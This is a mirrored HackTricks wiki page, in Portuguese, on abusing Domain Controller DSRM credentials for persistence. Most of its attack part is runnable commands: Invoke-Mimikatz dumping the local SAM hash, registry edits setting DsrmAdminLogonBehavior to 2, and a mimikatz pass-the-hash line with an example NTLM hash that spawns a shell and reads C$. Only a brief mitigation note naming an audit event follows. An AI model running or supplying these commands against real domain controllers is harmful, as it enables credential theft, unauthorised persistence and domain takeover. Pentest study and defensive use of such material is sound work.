Mirrors/hacktricks

Fork 0

mirror of https://github.com/carlospolop/hacktricks synced 2024-12-18 17:16:10 +00:00

Translator 08a2f294a9 Translated ['forensics/basic-forensic-methodology/memory-dump-analysis/R

2024-02-09 02:10:17 +00:00

3 KiB

Raw Blame History

Aprenda hacking AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!

Outras maneiras de apoiar o HackTricks:

Se você quiser ver sua empresa anunciada no HackTricks ou baixar o HackTricks em PDF Confira os PLANOS DE ASSINATURA!
Adquira o swag oficial PEASS & HackTricks
Descubra A Família PEASS, nossa coleção exclusiva de NFTs
Junte-se ao 💬 grupo Discord ou ao grupo telegram ou siga-nos no Twitter 🐦 @carlospolopm.
Compartilhe seus truques de hacking enviando PRs para os HackTricks e HackTricks Cloud repositórios do github.

Credenciais DSRM

Existe uma conta de administrador local dentro de cada DC. Tendo privilégios de administrador nesta máquina, você pode usar o mimikatz para dump the local Administrator hash. Em seguida, modificando um registro para ativar esta senha para que você possa acessar remotamente este usuário Administrador local.
Primeiro precisamos dumpar o hash do usuário Administrador local dentro do DC:

Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'

Então precisamos verificar se essa conta funcionará e, se a chave do registro tiver o valor "0" ou não existir, você precisa defini-la como "2":

Get-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior #Check if the key exists and get the value
New-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 -PropertyType DWORD #Create key with value "2" if it doesn't exist
Set-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2  #Change value to "2"

Em seguida, usando um PTH você pode listar o conteúdo de C$ ou até mesmo obter um shell. Observe que para criar uma nova sessão do powershell com esse hash na memória (para o PTH) o "domínio" usado é apenas o nome da máquina DC:

sekurlsa::pth /domain:dc-host-name /user:Administrator /ntlm:b629ad5753f4c441e3af31c97fad8973 /run:powershell.exe
#And in new spawned powershell you now can access via NTLM the content of C$
ls \\dc-host-name\C$

Mais informações sobre isso em: https://adsecurity.org/?p=1714 e https://adsecurity.org/?p=1785

Mitigação

Evento ID 4657 - Auditoria da criação/mudança de HKLM:\System\CurrentControlSet\Control\Lsa DsrmAdminLogonBehavior

3 KiB Raw Blame History

Credenciais DSRM

Mitigação

3 KiB

Raw Blame History